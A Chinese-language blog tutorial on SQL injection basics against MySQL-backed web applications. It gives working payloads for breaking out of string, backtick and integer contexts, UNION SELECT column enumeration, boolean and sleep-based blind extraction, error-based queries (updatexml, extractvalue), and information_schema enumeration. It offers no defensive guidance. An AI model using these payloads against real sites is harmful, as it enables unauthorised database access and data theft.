美文网首页SQL用法sql注入程序员
SQL注入基础

SQL注入基础

作者: 渺小Y | 来源:发表于2018-08-03 15:22 被阅读11次

什么是SQL注入

拼接sql得到想要的数据或反应, 而这些sql是不常见的编程逻辑的sql.

SQL语句闭合问题

  • 字符串类型闭合

    1. 单引号 - 值的类型是字符串类型
      一般是对where ,if 等表达式的条件值进行引用
      注入URL:

      http://x.x.x.x/name=test' and '1'='1' %23

      后端SQL:

      select c1,c2 from db.table where name='test' and '1'='1' #'

      解释一下: %23就是#quote后的值, 其中' and '1'='1' #为注入的SQL

      可以发现, name是字符串类型字段, 字符串类型必须使用单引号将变量值括起来才符合SQL语法
      其中 '1'='1' 就是注入点, 可以换成自己的语句

    2. 反引号 - 字段名
      一般是对 group by, order by 等对字段进行操作的表达式中字段名的引用
      注入URL:

      http://x.x.x.x/order=name`, if(1=1,1,2) %23

      后端SQL:

      select c1,c2 from db.table order by `name`, if(1=1,1,aaa) #`

      解释一下:

      • URL中的name`, if(1=1,1,2) %23, name后的反引号提前把name闭合,紧接着注入了, if(1=1,1,2) %23, %23#, 直接把后面的sql语句给注释了
      • if里面的aaa是一个不存在(乱写的)的字段名, 其中1=1就是注入点, 可以换成自己的语句, 观察页面变化来进行盲注
      • order by x,y 可以根据多个字段名排序, 当后端做了变量检查可以尝试使用逗号多个字段排序来注入
      • 注意: group by, order by 字段名 的时候, 是可加可不加反引号的, 需要尝试才知道后端代码是否加了反引号
  • 整数类型闭合

    注入URL:

    http://x.x.x.x/id=1 and 1=1 %23

    后端SQL:

    select c1,c2 from db.table where id=1 and 1=1 #

    解释一下:
    整数类型的变量过滤无需单引号, 同样1=1为注入点

SQL注入分类

  • UNION SELECT

    union select 可以将后面的select出的数据与前面的select出的结果集进行合并

    image.png
    union select 所需前置条件

    1. union select的字段数目必须与前面select语句的数目一致
      办法: 使用order by N 进行猜测(N是整数, 代表第几个字段)
      select depts.id, depts.name from depts order by 1
      这里的1是指字段的位置, 代表使用第一个字段进行排序, 如果使用超出字段数目的位置参数排序就会报错, 由此可以推算出select的字段个数, 如下图:

      image.png

    2. union select的字段的类型必须与前面的匹配
      办法: 使用 null 代替, 因为所有类型字段都支持null, 如下图所示
      select depts.id, depts.name from depts where id = 1 union select null, null

      image.png
  • 盲注

    前面的union select 可以将数据暴露到页面上, 但是有些情况无法使用union select, 比如:

    • union select 被WAF过滤
    • http页面返回内容没有变化

    盲注原理:
    顾名思义, 盲注就是我们不能直接的看到数据的展示或变化
    盲注SQL:

    select depts.id, depts.name from depts where id = 1 and if(ascii(substring(database(), 1 ,1)) = 101,1,0)

    SQL解释:

    • database() 当前数据库的名字, 在这里是"ec_ops"
    • substring('ec_ops',1,1) 取出'ec_ops'的第一个字符'e'; 第一个1是第一次, 第二个1是步进值为1
    • ascii('e') 将'e'字符转成ascii码; 'e'的ascii为101
    • if(ascii('e')=101,1,0)ascii('e')=101为true的时候, 返回1(既true), 否则返回0(既false);
    • id = 1 and if() -- 当左右两个条件同时为true时, 才展示数据,这样可以根据页面数据变化来判断if里面猜测是否正确, if(xx=xx,1,0) 条件为真的值(例子中是1)也可以换成sleep(1), 成功则睡一秒, 根据访问延迟来判断是否成功

    注: 英文可见字符的ascii码范围: 32-127, 逐步实验可以撞出库名的所有字符的ascii码, 也就得出完整的库名

  • 报错
    使用报错注入的前置条件
    web后端service开启了报错开关允许打印到web前端显示
    • and 1=(updatexml(1,concat(0x3a,(select user())),1)) 获取当前数据库用户
    • and extractvalue(0x7e,concat(0x7e,user())) 获取当前数据库用户
    • and exp(~(select * from(select user())a)) 获取当前数据库服务器类型
    • and linestring(id) 快速获得当前库名、表名
    • ....

练手

  • MySQL
    information_schema 存放着数据库的所有信息, 包括有哪些库, 表, 字段
    • select schema_name from information_schema.schemata -- 所有数据库名
    • select table_name from information_schema.tables where table_schema = 'db_name' --获取db_name的所有表
    • select column_name from information_schema.columns where table_schema = 'db_name' and table_name = 'table_name' --获取db_name.table_name的所有字段名

常见注入点

  • WHERE column_name [ = | like ] value
    select c1,c2 from tables where id = 1 [ and | having ] condition
    使用 and / having 或 "union select" 连接其他sql语句

    image.png

  • ORDER BY column_name

    例1: select id, name from ec_ops.depts order by if(1=1,id,name)
    1=1为真时, 以id进行排序, 否则以name排序, 1=1可以换成其他sql语句
    注意: 如果将if里的id换为sleep(1), 每条数据都会睡一次, 如果有300条数据则睡300秒, 即使加limit 1也没用 慎用

    例2: select id, name from ec_ops.depts order by rand()
    随机排序

    例3:

    select id from depts order by 
    case 
        when 1=1          # 当1=1为真以id排序
            then id 
        when 1=2          # 当1=2为真以name排序
            then name
        when 1=3          # 当1=3为真以title排序
            then title
        else author       # 以上条件都不符合则以author排序
    end

    总结: order by就是利用不同字段排序, 来观察数据变化从而进行盲注

相关文章

  • SQL注入

    SQL注入 概念 危害 原理 实例 防御 基础 - ### SQL语句所用符号不同数据库的sql注入与提权常见S...

  • SQL注入基础

    MySQL 通过AppServ/wamp/xampp可以在windows系统中快速搭建出一个Apache+PHP+...

  • SQL注入基础

    什么是SQL注入 拼接sql得到想要的数据或反应, 而这些sql是不常见的编程逻辑的sql. SQL语句闭合问题 ...

  • SQL注入 基础

    声明 该文集的内容仅供交流学习使用,一切实验均在靶机上进行,切勿随便乱拿公共网址做实验 说明 该文集主要写的是对s...

  • CTFer成长之路-Web入门之SQL注入

    SQL注入基础 数字型注入和UNION注入 table_name字段是information_schema库的ta...

  • sql注入——转载自实验楼

    Sql 注入基础原理介绍一、实验说明1.1 实验内容SQL注入攻击通过构建特殊的输入作为参数传入Web应用程序,而...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • SQL注入 注入测试基础

    1.测试是否有漏洞 单引号测试法 test.php?Id=1'通常来说,测试当加入字符后有错,再加上--+就没错的...

  • Sqli-labs搭建

    说好的从零开始,那就从最基础的sql注入开始呗 An introduction to SQL injection ...

  • 笔记:web漏洞

    SQL注入 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,...

网友评论

    本文标题:SQL注入基础

    本文链接:https://www.haomeiwen.com/subject/ifpyvftx.html

    延伸阅读

    深度阅读

    • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

    栏目导航

    热点阅读

    SQL用法

    sql注入

    程序员

    关于我们|服务条款|联系我们|SQL注入基础|投稿指南|网站地图|RSS订阅|排版工具|手机版

    提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

    Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

    备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

    本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

    所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!